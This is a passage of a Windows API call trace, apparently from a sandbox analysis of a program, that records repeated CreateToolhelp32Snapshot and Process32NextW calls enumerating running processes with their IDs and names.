szExeFile="attend.exe")) returned 1 [0154.610] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0154.612] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0154.613] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0154.614] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0154.616] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0154.617] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0154.618] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0154.620] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.621] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0154.623] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0154.624] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0154.625] CloseHandle (hObject=0xbc) returned 1 [0154.625] Sleep (dwMilliseconds=0x12c) [0154.933] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0154.937] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.938] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0154.939] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0154.939] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0154.940] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0154.941] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0154.941] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0154.942] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0154.942] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0154.943] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0154.944] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.944] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.945] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.946] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.946] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.947] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0154.948] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.948] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.949] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0154.950] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.951] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0154.952] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0154.954] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0154.955] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0154.956] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.972] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0154.974] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0154.975] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0154.976] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0154.977] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0154.978] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0154.979] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0154.988] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0154.989] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0154.990] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0154.991] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0154.992] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0154.993] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0154.994] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0154.995] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0154.996] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0154.997] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0154.998] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0154.999] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0155.000] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0155.001] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0155.002] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.003] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0155.004] CloseHandle (hObject=0xc4) returned 1 [0155.004] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0155.009] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.010] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0155.010] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0155.011] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0155.012] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0155.012] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0155.013] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0155.014] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0155.015] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0155.016] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0155.016] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.017] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.018] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.018] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.019] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.020] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0155.020] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.021] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.021] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0155.023] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0155.024] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0155.025] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0155.036] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, 